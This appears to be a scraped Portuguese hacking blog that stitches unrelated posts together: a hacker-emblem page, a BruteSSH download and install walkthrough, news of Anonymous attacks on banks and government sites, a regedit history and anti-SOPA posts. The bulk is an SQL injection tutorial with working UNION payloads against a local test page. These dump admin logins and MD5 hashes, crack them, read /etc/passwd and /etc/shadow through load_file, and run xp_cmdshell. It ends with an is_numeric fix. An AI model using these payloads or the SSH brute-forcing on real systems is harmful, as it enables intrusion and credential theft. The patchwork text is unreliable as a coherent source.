Linux possui seu pinguim e os BSD’s seu daemon. Perl possui um camelo, os fans da FSF tem seu gnu e a OSI possui o logo do open source. O que nós não temos, historicamente, é um emblema que represente toda a comunidade hacker dos quais esses grupos fazem parte. Esta é uma proposta para que adotemos um — o padrão glider do Jogo da Vida.
Essa idéia foi alpha-testada entre aproximadamente metade dos hackers e eles instantaneamente disseram “Wow! Legal!” sem precisarem de mais nenhuma explicação. Se você não sabe o que um glider é, ou porque ele poderia tornar-se um bom emblema, ou se você somente tem dúvidas sobre ter um emblema, leia a página de FAQ.
A primeira vez que propuz esse emblema foi em Outubro de 2003. Desde então ele entrou em grande uso e se espalhou, como você pode ver pelo número de tranduções internacionais na esquerda. Não universalmente, porque muitos hackers não concordam a príncipio com a idéia de ter um emblema, mas parece ser um símbolo de sucesso.

O que estarei dizendo se exibí-lo?

Quando você coloca o emblema glider na sua web page, ou usa ele em alguma roupa, ou exibe ele de alguma outra maneira, você está visivelmente associando-se com a cultura hacker. Isso não é exatamente a mesma coisa que reivindicar que você é um hacker — isso é um título de honra que geralmente deve ser conferido pelos outros ao invés de ser auto-assumido. Mas ao usar esse emblema, você expressa sua simpatia com os objetivos , valores e maneiras de viver dos hackers. Veja o FAQ para uma discussão mais aprofundada.
Sim, após apenas 4 dias que esta proposta foi lançada, haviam canecas e camisetas. Por favor, observe que eu não tenho nada a ver com isso e eu não estou recebendo nada; de fato, os rendimentos estão indo para a Electronic Frontier Foundation. Agora existe uma segunda fonte com designs diferentes.

Quem não deve usar este emblema?

Se você invade computadores de outras pessoas, aqueles de nós que inventaram o emblema não querem que você o exiba. Vá inventar o seu próprio emblema. Nós descobriremos alguma maneira de envergonhar e rejeitar sua publicidade se você sujar a nossa.
Eu costumava ter uma proibição contra uso comercial aqui. Um número de pessoas argumentou convincentemente que isso não era prático e talvez inusto. Mas mantenha o bom gosto, ou você será flamed.

Como posso usá-lo?

O glider não possui copyright ou trademark. A maneira recomendada para usá-lo é em uma página, com uma imagem e um link para essa página ou diretamente para How To Become A Hacker. Segue aqui um pedaço de código XHTML que você pode colar em uma página.

<a href=’http://www.catb.org/hacker-emblem/’> <img src=’http://www.catb.org/hacker-emblem/glider.png’ alt=’hacker emblem’ /></a> Aqui está como ele irá aparecer:

Sinta-se livre para aumentar ou diminuir a imagem. Esse arquivo PNG foi gerado a partir de um fonte PIC e então reduzido pela metade. Você também pode baixar uma versão SVG , uma .ico, uma versão PostScript encapsulada, ou até o código TEX .

Variações:

Antes de criar sua própria variação, por favor leia o FAQ. Aqui estão algumas variações que recebi:

.O. ..O OOO
|_|0|_| |_|_|0| |0|0|0|

Aqui está um karamba theme para exibir o emblema glider em um desktop KDE.
Aqui existe um versão no formato ico , e aqui outra. Se você nomear alguma dessas imagens de favicon.ico e colocá-la no diretório raiz de seu site, ela irá se tornar o ícone do seu site.
Esta tatuagem é impressinante, mas parece um pouco excessivo.

Ref: http://remote-execution.blogspot.com…m-emblema.html

Introdução
BruteSSH é um script feito em python que é capaz de fazer brute-force no serviço SSH. Para uma simples demo, irei realizar o ataque em minha própria máquina (127.0.0.1)

Instalando o BruteSSH
Abra o terminal e faça o download do arquivo pelo comandos a seguir:

root@bt:~# wget http://www.edge-security.com/soft/brutessh-0.5.tar.bz2

root@bt:~# tar -jxvf brutessh-0.5.tar.bz2

root@bt:~# cd brutessh
root@bt:~/brutessh#

root@bt:~/brutessh# python brutessh.py

-h: Host destino
-u: Usuário
-d: Arquivo de senha

#!/bin/bash
# Por Jarlley Ribeiro - 0fx66

clear
echo "  [        Brute install                  ]"
echo "  [       0fx66 - www.0fx66.blogspot.com  ]"
echo ""
echo " [*]  Downloadind BruteSSH. Please Wait..."
wget http://www.edge-security.com/soft/brutessh-0.5.tar.bz2 1> /dev/null 2> /dev/stdout
echo " [*]  Unpacking Brutessh. Please Wait..."
tar -jxvf brutessh-0.5.tar.bz2 1> /dev/null 2> /dev/stdout
echo " [*]  OK!"
echo " [*]  To run, use: python brutessh.py"
echo "  Exiting.."

root@bt:~/aaa# chmod +x brutessh_Install.sh

root@bt:~/brutessh# python brutessh.py -h 127.0.0.1 -u root -d password

Vários sites de instituições bancárias foram derrubados pelo Anonymous nos últimos dias. E depois do Bradesco e do Banco do Brasil, hoje foi a vez de o HSBC ser atacado pelo grupo de hackers. Os objetivos do ataque já haviam sido divulgados em entrevista concedida ao Tecmundo.

Como os próprios integrantes afirmaram: atacando sites de bancos, o Anonymous afeta muito mais pessoas, o que pode ser muito bom para chamar a atenção para a causa deles. O Tecmundo constatou a instabilidade nos servidores do HSBC, que até o fechamento desta notícia (11:05 da manhã; 2 de fevereiro) não podia ser acessado.

Fonte: http://www.tecmundo.com.br/ataque-hacker/18841-tango-down-site-do-hsbc-foi-derrubado-pelo-anonymous.htm#ixzz1lEpGCsCk

Olá pessoal, continuando o tutorial aqui sobre REGEDIT agora com a parte 3.

Um pouco de história.

Regedit é um programa que você pode usar para acessar e editar o Registro no Microsoft Windows. O registro pode ser editado manualmente pelo regedit.exe execução. Você pode mesmo usar regedt32.exe. Ele normalmente vem com a instalação padrão do Windows.

Ele pode ser iniciado a partir do Run (Iniciar>>> Executar), Editar o Registro deve ser feito com cuidado, e com a compreensão, tanto quanto possível a respeito de porque e onde você está fazendo uma mudança. Edição do Registro descuidado pode causar danos irreversíveis. É altamente recomendável que você faça backup do Registro antes de fazer quaisquer alterações.

Uma ferramenta simples regedit apareceu em Windows 3.x, o chamado “Editor de Registro Info” ou “Editor de Registro” Regedt32.exe. Este foi apenas um banco de dados de aplicações utilizadas para editar objetos OLE incorporados em documentos. Com o Windows 9x REGEDIT.EXE sistemas operacionais foi incluído. Windows NT introduziu permissões para edição do Registro. Windows NT 4.0 e Windows 2000 continha tanto o Windows 9x e REGEDIT.EXE s Windows NT 3.x “.

Windows XP foi o primeiro sistema a integrar estes dois programas em um só. Regedit32 apenas executa o REGEDIT no XP.

Noções do REGEDIT parte 1: http://www.inw-seguranca.com/2012/01/15/tutorial-nocoes-de-regedit-parte-1/

Noçoes do REGEDIT parte 2: http://www.inw-seguranca.com/2012/01/25/tutorial-nocoes-do-regedit-registro-parte-2/

Continuando na próxima parte.

Autor: WCG 147

Segundo o grupo, a operação contra os bancos se dará ao longo de toda esta semana e receberá o nome de #OpWeeksPayment

São Paulo – O grupo hacker Anonymous divulgou nessa segunda-feira que dará início a uma série de ataques contra páginas online das principais instituições financeiras do Brasil.
Segundo o grupo, a operação contra os bancos se dará ao longo de toda esta semana e receberá o nome de #OpWeeksPayment. Cada dia da semana será destinado a um serviço de internet banking, que deverá ficar fora do ar por 12 horas.

O objetivo do grupo é alertar a população sobre a injustiça e a corrupção que predomina no Brasil. E esta semana foi escolhida por conter os principais dias para pagamento dos salários.

A Info registrou intermitência no acesso ao site do banco Itaú na manhã desta segunda-feira (30). Em contato com a assessoria de imprensa da instituição, até o fechamento desta matéria, ainda não recebemos uma posição oficial a respeito de eventuais ataques na página da empresa.

Antes de qualquer coisa, vamos definir aqui duas palavras que têm confundido muita gente:

Deface: Ato ou efeito de desfigurar uma página
Defacer: Aquele que pratica o deface.

Ok, agora podemos continuar (eu acho que posso, já que estou navegando a 18 Kbps (isso mesmo, são kilobits, e não kilobytes) por conta da chuva).

Há um tempo eu havia postado um tutorial sobre o SQLi. Porém, foi muito baseado na teoria, e não na prática. Em todo caso, recomendo que, antes de prosseguir, você o leia também, bem como as sugestões dadas nele. Clique aqui.

Vamos esclarecer o principal defeito que houve em meu tutorial:
Hoje em dia qualquer programador, por mais iniciante que possa ser, coloca no mínimo um addslashes em sua página. Além disso, é muito difícil nos dias de hoje você ler o erro vindo direto do servidor SQL (por exemplo, mysql_error()). Outro ponto importante é que eu buscava todos os dados de uma vez. O limite de um dado por vez é dispensado pelo DVWA, mas é sempre necessário em outros sistemas. Não só a página remota, como também sua conexão.

Tudo bem, então vamos iniciar.
Vamos criar nosso próprio ambiente de teste localmente. Para tanto, teremos um script em PHP que eu salvei como noticia.php, que será o responsável por obter a notícia na base de dados e exibí-la, e um banco de dados. Nossa missão é capturar as senhas.
Crie a base de dados no PHPMyAdmin, Adminer ou o seu gerenciador SQL predileto. Feito isso, rode a query:

SET NAMES utf8;
SET foreign_key_checks = 0;
SET time_zone = 'SYSTEM';
SET sql_mode = 'NO_AUTO_VALUE_ON_ZERO';

CREATE TABLE `admin` (
  `login` varchar(255) NOT NULL,
  `senha` varchar(255) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

INSERT INTO `admin` (`login`, `senha`) VALUES
('joao',        '21232f297a57a5a743894a0e4a801fc3'),
('maria',       '49f8aa089b957fe92343d08032b3b436');

CREATE TABLE `noticias` (
  `id` int(11) NOT NULL,
  `titulo` varchar(255) NOT NULL,
  `texto` text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

INSERT INTO `noticias` (`id`, `titulo`, `texto`) VALUES
(1,     'Lorem ipsum dolor sit amet',   'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas volutpat elit ut dolor feugiat sit amet dapibus velit sodales. Nunc posuere, mi eu euismod posuere, risus dui dictum est, id iaculis mi erat a diam. Quisque eget ante at magna aliquam consectetur et id felis. Donec accumsan dapibus mi id facilisis. Maecenas at mauris erat. Nunc consectetur nulla id nisl fringilla at eleifend urna volutpat. Sed pellentesque ligula sit amet magna molestie vitae iaculis risus accumsan. Morbi eget mattis nibh. Morbi tortor risus, adipiscing quis auctor at, pulvinar quis dolor.\n\nMorbi ac tempor turpis. Nulla sit amet lectus enim, eget aliquet lorem. Aliquam sit amet nunc in sem tempor rhoncus id ut odio. Morbi condimentum ipsum in urna tempus dapibus. Duis a eleifend dui. Sed condimentum semper blandit. Praesent in justo eget lorem tempus tincidunt vel non tortor. Aliquam quis dictum orci. Nulla dictum lobortis posuere. Donec eleifend cursus orci eu fringilla. Donec volutpat elit eget nibh egestas quis pharetra enim dictum. Nam tortor orci, suscipit at aliquam sed, blandit vitae odio.\n\nCurabitur rhoncus nisi blandit elit fringilla vitae varius nulla sollicitudin. Pellentesque elementum, ante sed bibendum ornare, sapien quam pellentesque lectus, vitae aliquam libero libero sit amet mi. Praesent tellus tortor, volutpat at placerat non, fringilla a nunc. Nulla laoreet lacinia justo, in gravida tellus ultricies sit amet. Nulla pulvinar tortor condimentum leo cursus eleifend. Curabitur faucibus leo in magna varius at lobortis purus vulputate. Praesent venenatis leo et lorem egestas bibendum varius magna facilisis. Nam id urna elit, vitae sagittis augue. Ut non elit vel nisl rutrum elementum a a risus. Integer id nibh ut magna scelerisque vehicula. Donec sit amet odio sed magna suscipit dapibus eget vel tellus. Proin lacinia ipsum at diam placerat iaculis. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Quisque suscipit ultricies sollicitudin. Nullam nec sodales nisl. Donec vehicula odio a nisl posuere id vestibulum libero congue.\n\nNam non velit diam. Pellentesque consequat accumsan venenatis. Cras egestas rhoncus luctus. Ut eu nibh urna, ac pharetra nisi. Maecenas dapibus laoreet augue, eget placerat lectus blandit a. Integer semper accumsan velit vel rutrum. Proin commodo pharetra justo, id rhoncus sem mattis sed. Nullam adipiscing hendrerit faucibus. Nullam fermentum pharetra massa gravida congue. Integer at tortor non lectus accumsan lobortis. Aliquam blandit egestas vestibulum. Suspendisse tincidunt cursus arcu.\n\nNulla est neque, feugiat aliquam malesuada eu, consequat in velit. Praesent et nunc erat. Nunc lacus ipsum, bibendum at dignissim ac, posuere sed metus. Curabitur facilisis magna nec tellus sollicitudin vel cursus mauris ullamcorper. Sed neque libero, commodo et vehicula et, venenatis eget odio. Pellentesque scelerisque orci in ligula sollicitudin eu fermentum diam placerat. Duis malesuada condimentum massa, a luctus risus euismod in. Nunc risus ante, lacinia volutpat adipiscing sed, venenatis at nisl. Sed vestibulum fermentum libero, at tristique odio adipiscing vitae.'),
(2,     'Neque porro quisquam est qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit',  'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Suspendisse nibh purus, hendrerit non sagittis eget, ultricies sed mi. Suspendisse in imperdiet odio. Morbi malesuada mattis semper. Aenean non nibh dui. Quisque rutrum condimentum nunc, et placerat justo vulputate vel. Proin tempor mattis lacus, convallis auctor mauris auctor id. Vestibulum nisi lectus, feugiat sit amet ullamcorper eu, auctor sed velit. Praesent aliquam mollis libero, eu tincidunt libero malesuada sed. Maecenas accumsan urna urna. Nulla turpis orci, suscipit nec euismod vitae, feugiat a massa. Aliquam non sem eget sem condimentum ullamcorper. Donec augue leo, auctor imperdiet faucibus ut, imperdiet eu nulla. Donec et quam neque. Nunc sagittis egestas convallis. Duis in sem porttitor dui dictum facilisis eget sed risus. Quisque ultricies justo id leo auctor vehicula lobortis ligula posuere.\n\nPraesent enim lacus, posuere quis rhoncus vel, tempus non nunc. Cras euismod mattis diam ac tempor. Mauris id orci arcu. Fusce eleifend feugiat est ut porttitor. Curabitur id erat sit amet tortor rutrum tempus sed eget enim. Sed fringilla viverra eros sed commodo. Quisque purus turpis, tincidunt vitae feugiat in, sagittis eu dolor. Praesent malesuada consequat tortor. Aliquam sed ante urna, ac mollis metus. Etiam at pretium enim.\n\nFusce euismod mattis ligula, eu rutrum erat blandit eget. Praesent non varius libero. Maecenas viverra elit sed neque aliquam a tincidunt risus eleifend. Curabitur tincidunt, arcu quis congue faucibus, nunc justo tincidunt risus, eu suscipit turpis urna non erat. Morbi mattis condimentum mauris ac tempus. Morbi vulputate dui non eros pulvinar tempus. Morbi fringilla ornare mauris, eu bibendum diam feugiat tincidunt. Donec euismod, urna sed lacinia volutpat, nisi velit cursus odio, quis fermentum sem lectus eget mauris. Mauris condimentum scelerisque vehicula. Duis sed enim lacus. Suspendisse potenti. Morbi suscipit lobortis convallis. Nunc sem libero, sollicitudin venenatis eleifend quis, euismod in justo. Nunc sodales mollis vulputate. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.\n\nNunc ac est urna. Sed mollis ipsum in orci dapibus eu pharetra dui eleifend. Quisque quis ligula mauris, eget bibendum magna. Pellentesque non urna augue, in vulputate augue. Integer eleifend accumsan sem quis facilisis. Aenean eleifend mi sed augue imperdiet sed fermentum nisl sodales. Aenean hendrerit ante ut nunc dignissim scelerisque. Integer vel mollis nunc.\n\nDonec eu est vitae quam tincidunt feugiat eu sit amet libero. In a consequat nisl. Sed sit amet nibh sit amet leo bibendum condimentum vestibulum eget leo. Donec id sagittis mauris. Vivamus massa metus, ullamcorper sit amet scelerisque ut, adipiscing a lectus. Maecenas volutpat lectus a est eleifend iaculis. Etiam arcu tellus, luctus luctus venenatis et, facilisis suscipit est. Ut convallis ornare erat tincidunt viverra. Pellentesque non massa sed turpis hendrerit ultrices. In neque orci, malesuada interdum tincidunt at, posuere eu justo. Aenean in dapibus ante. Ut tincidunt luctus ante at imperdiet. Vestibulum ultrices ullamcorper feugiat. Nulla facilisi.');

Isto irá criar duas tabelas na base. Na primeira tabela, são inseridas duas notícias (textos Lorem Ipsum), e na segunda, são inseridos login e senha – criptografada em MD5 – de dois usuários. Mas nós não sabemos disso.
(Repetindo) Nossa missão: Obter os dados administrativos.
Para isso, imagine que este é a página de notícias do website alvo. Salve este script como noticia.php no seu servidor local e rode-o pelo navegador.

<?php
$server = 'localhost'; // configure aqui
$login = 'root'; // configure aqui
$senha = '1708'; // configure aqui
$servidor = 'sqli'; // configure aqui

mysql_connect($server, $login, $senha) or die(mysql_error());
mysql_select_db($servidor) or die(mysql_error());

$id = mysql_real_escape_string($_GET['id']);
$id = addslashes($id);

$qry = mysql_query("SELECT * FROM noticias WHERE id=$id");
while($row = mysql_fetch_array($qry)) {
  $titulo = $row['titulo'];
  $texto = $row['texto'];
}
mysql_close();
?>
<html>
<head>
<title><?php echo $titulo; ?></title>
</head>
<body>
<b><?php echo $titulo; ?></b><br>
<?php echo $texto; ?>
</body>
</html>

Rode este script em localhost, lembrando de configurar o princípio do mesmo. Note que eu utilizei as duas funções que estão sendo postas à prova, juntas. Estas funções prometem proteger o website contra SQLi. Toda esta proteção vai falhar. Duvida?
Então vamos lá. Primeiro, vamos acessar normalmente as notícias 1 e 2:

* noticia.php?id=1
* noticia.php?id=2

Agora, vamos inserir uma aspa na URL, de forma a causar o erro e confirmar a vulnerabilidade:

* noticia.php?id=’1

Tudo ok? Erro aparecendo:

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/noticia.php on line 14

Então realmente houve um erro. Agora vamos utilizar o ORDER BY para identificar o número de colunas existente na tabela atual. Iremos também utilizar –+ para comentar e inutilizar o restante da query, se houver.

* noticia.php?id=1 order by 1–+
* noticia.php?id=1 order by 2–+
* noticia.php?id=1 order by 3–+
* noticia.php?id=1 order by 4–+

Note que nos 3 primeiros testes, a notícia é exibida corretamente. Já no último, houve um erro. Isto indica que a coluna #4 não existe. Sendo assim, temos 3 colunas na tabela atual. Você pode verificar isso no seu gerenciador SQL, se quiser.
Agora vamos utilizar o UNION ALL para identificar para onde vai o conteúdo de cada coluna. Antes disso, repare que negativamos o número 1 (ID da notícia), para que a mesma não seja trazida do banco de dados, e o ataque fique mais rápido.

* noticia.php?id=-1 union all select 1,2,3–+

Há vários casos em que isto não dá certo, mesmo que haja 3 colunas na base atual. Isto porque o programador pode selecionar dados de 2 colunas diferentes ou até mesmo não selecionar todas as colunas da tabela atual. Neste caso, basta ir tentando diferentes números até conseguir.
Note que a coluna 1 não retorna dados. É porque ela é a identificação da notícia, usada na condição WHERE, certo? As colunas 2 e 3 contém, respectivamente, o título e o texto da notícia. Notamos isso pois esses números aparecem naquele local na página.
Primeiramente, vamos obter alguns dados que aparecerão no lugar da coluna 3 (conteúdo da notícia). Vamos obter o nome do banco de dados atual, a versão e o usuário do mysql. Para obter 3 dados em apenas 1 campo, usamos o concat().

* noticia.php?id=-1 union all select 1,2,concat(user(),0x3c3d3e,database(),0x3c3d3e,ver sion())–+

Se a versão do MySQL for maior que 5, teremos o information_schema, que nos ajudará bastante.
Agora vamos obter todos as bases de dados do servidor. Para isso, vamos usar a coluna 2 (título) e a tabela ‘schemata’ do information_schema.

* noticia.php?id=-1 union all select 1,schema_name,concat(user(),0x3c3d3e,database(),0x 3c3d3e,version()) from information_schema.schemata limit 0,1–+
* noticia.php?id=-1 union all select 1,schema_name,concat(user(),0x3c3d3e,database(),0x 3c3d3e,version()) from information_schema.schemata limit 1,1–+

Vamos aumentar o LIMIT de 0,1 para 1,1 2,1 3,1 4,1 até gerar erro, que indicará o fim da lista. Devemos sempre limitar os dados. O próprio Havij faz isso. Note que os dados aparecem um a um.
Agora vamos obter o nome de todas as tabelas do banco de dados atual:

* noticia.php?id=-1 union all select 1,table_name,concat(user(),0x3c3d3e,database(),0×3 c3d3e,version()) from information_schema.tables where table_schema=database() limit 0,1–+

Note que não estamos utilizando aspas, então o ataque é bem-sucedido. Vamos alterando o limit e note que conseguimos obter “admin” e “noticias” e um erro.
Repare também que apenas substituímos o número 2, para que esses dados apareçam no lugar do mesmo na página.
Agora, vamos pegar o nome de todas as colunas da tabela “admin”, que julgamos nos interessar (a base do achismo). Veja como é feito:

* noticia.php?id=-1 union all select 1,column_name,concat(user(),0x3c3d3e,database(),0x 3c3d3e,version()) from information_schema.columns where table_name=(‘admin’) and table_schema=database() limit 0,1–+

Mas aí temos um problema: na condição where, utilizamos aspas para indicar o nome da tabela. Nossas aspas foram escapadas e não temos como continuar, certo? Errado.
O que faremos é converter o nome da tabela para hexadecimal. admin em hexa fica 0x61646d696e. Vamos ver como ficaremos:

* noticia.php?id=-1 union all select 1,column_name,concat(user(),0x3c3d3e,database(),0x 3c3d3e,version()) from information_schema.columns where table_name=0x61646d696e and table_schema=database() limit 0,1–+

Vamos alterando o limit e veja que conseguimos obter “login” e “senha”. Vamos então, enfim, obter os dados desta tabela, utilizando o concat() para pegar mais de um dado:

* noticia.php?id=-1 union all select 1,concat(login,0x3c3d3e,senha),concat(user(),0x3c3 d3e,database(),0x3c3d3e,version()) from sqli.admin limit 0,1

0x3c3d3e significa ” e utilizamos estes símbolos para separar um dado do outro, para não nos confundirmos.
Vá alterando o limit e veja que conseguimos obter:

joao<=>21232f297a57a5a743894a0e4a801fc3
maria<=>49f8aa089b957fe92343d08032b3b436

Para terminar, vamos descriptografar essas hashs md5, utilizando o MD5Decrypter, que usa um banco de dados com várias hashes:

21232f297a57a5a743894a0e4a801fc3 MD5 : admin
49f8aa089b957fe92343d08032b3b436 [Not Found]

Viu só? Utilizamos as duas funções, e estas não nos foram úteis.
O que fazer então? No lugar de colocar as duas funções, neste caso, inúteis, já que receberemos apenas números, podemos fazer:

$id = is_numeric($_GET['id']) ? $_GET['id'] : die();

Ou seja, se $_GET['id'] for numérico, seu valor será atribuído à variável $id. Caso contrário, o script morrerá (irá parar sua execução).

Simples, não?

Mas, ‘peraí’, duas coisas extras que o Havij faz e eu não mostrei (ainda):
Lendo arquivos
É extremamente fácil ler arquivos pelo SQLi. No entanto, deve estar rodando, no servidor SQL, um usuário que tenha permissão para ler o arquivo requerido.
É simples: no lugar de buscar dados do banco de dados, use a função load_file(), colocando entre os parêntesis da função, o nome do arquivo (desde a raiz) que você deseja ler. Veja um exemplo:

• noticia.php?id=-1 union all select 1,load_file(0x2f6574632f706173737764),3 limit 0,1–+

Aqui, obtivemos o conteúdo do arquivo /etc/passwd, que guarda os usuários daquele computador (Unix). É melhor ver o conteúdo do arquivo pelo código-fonte, já que dificilmente as quebras de linha serão mostradas. Caso haja um ‘x’ no local da senha, é aquela velha criptografia terrível. Você verá as senhas criptografadas no arquivo /etc/shadow (0x2f6574632f736861646f77).
Rodar comandos no terminal
Isto só é possível em servidores Windows com Microsoft SQL Server que permite a execução de comandos. É bem simples. No lugar de obter dados da base de dados, use o comando host ou xp_cmdshell para executar o comando. Veja (rodando o comando ‘ls’, para ter a lista dos arquivos do diretório atual):

* noticia.php?id=-1 union all select 1,xp_cmdshell 0x6c73,3 limit 0,1–+
* noticia.php?id=-1 union all select 1,host 0x6c73,3 limit 0,1–+

Como estou usando Linux e MySQL, este exemplo não funcionará.

Para terminar, perceba que, se é seu caso, não é você quem é o defacer, e sim o ItSecTeam (desenvolvedores do Havij). Quem faz o hacker não são as ferramentas, mas, sim, o conhecimento. O Havij nem sempre estará quando for necessário.

Até a próxima!
AUTOR: 0KaL

Um dia depois que Wikipedia, Google, Yahoo!, Facebook e outras empresas se uniram em um protesto contra a lei antipirataria dos Estados Unidos, legisladores do país abandonaram nesta quinta-feira (19) o projeto de lei de regulação da internet, informou a imprensa.

De acordo com a publicação digital Ars Technica, até esta manhã pelo menos 18 senadores, em sua maioria republicanos e alguns deles promovedores do projeto de lei conhecido como SOPA, se afastaram da iniciativa que na quarta causou um “blecaute” na internet.

O canal MSNBC informou que o senador Roy Blunt, republicano do Missouri, retirou seu apoio seguindo os passos do também republicano Marco Rubio, da Flórida.

O projeto de lei tem o apoio da indústria do cinema e da música, com o argumento de que se busca uma proteção dos direitos autorais e de propriedade intelectual. Estas indústrias querem que o Google e outros serviços de internet bloqueiem os sites onde são distribuídos filmes, músicas e outros bens pirateados.

As empresas da internet sustentam que a legislação promove a censura, altera a operacionalidade da internet e prejudica sua capacidade para a inovação.

O governo do presidente Barack Obama expressou na semana passada sua oposição a qualquer legislação que imponha censuras à internet.

O fato de a maioria dos legisladores que retiraram o apoio à iniciativa serem republicanos surpreendeu bastante, já que os assuntos relacionados aos direitos autorais, tradicionalmente, são considerados um assunto livre de partidarismos.

Antes do protesto virtual desta quarta, a iniciativa tinha 16 apoiadores republicanos e 23 democratas. Até esta manhã já perdeu pelo menos um quarto do respaldo republicano, enquanto apenas um democrata, Ben Cardin, de Maryland, retirou seu apoio.

“Copyright Efe – Todos os direitos de reprodução e representação são reservados para a Agência Efe.”

Fonte: R7

Em um documento postado no site Pastebin e no vídeo acima, os hackers do Anonymous oficializaram a série de ataques que fizeram na noite de hoje (19). Em resposta ao fechamento do site Megaupload, o grupo derrubou os seguintes websites:

• Departamento de Justiça dos EUA – justice.gov e usdoj.gov
• Universal Music – universalmusic.com
• RIAA – riaa.org
• MPAA – mpaa.org
• Orgão responsável pelos direitos autorais – copyright.com
• HADOPI, orgão francês responsável pelos direitos autorais – hadopi.fr
• Warner Music Group – wmg.com
• BMI – bmi.com
• FBI – fbi.gov

Após um dia de protestos contra o SOPA, a operação do FBI para remover um dos maiores sites de compartilhamento de arquivos da web parece ter acontecido em uma péssima hora. A revolta do Anonymous não deve se resumir a isso e internautas já falam em uma “Primeira Guerra Virtual”. O que será que vem por aí?

Fonte: Tecmundo

Olá,
Caso você não saiba a internet está a ponto de se tornar algo controlado por uma ditadura.
Onde fecharão sites, cortarão a internet do usuário e até o PRENDERÃO!

Somos totalmente contra isso, somos contra o projeto SOPA e PIPA!

Estamos com vocês Annonymous!
Devemos parar isso o mais rápido possível!

Compartilhe e conte à seus amigos,
Devemos mostrar ao governo que não iremos aceitar esta censura.

Assine a petição virtual contra o SOPA e PIPA: http://www.avaaz.org/po/save_the_internet_action_center_b/?copy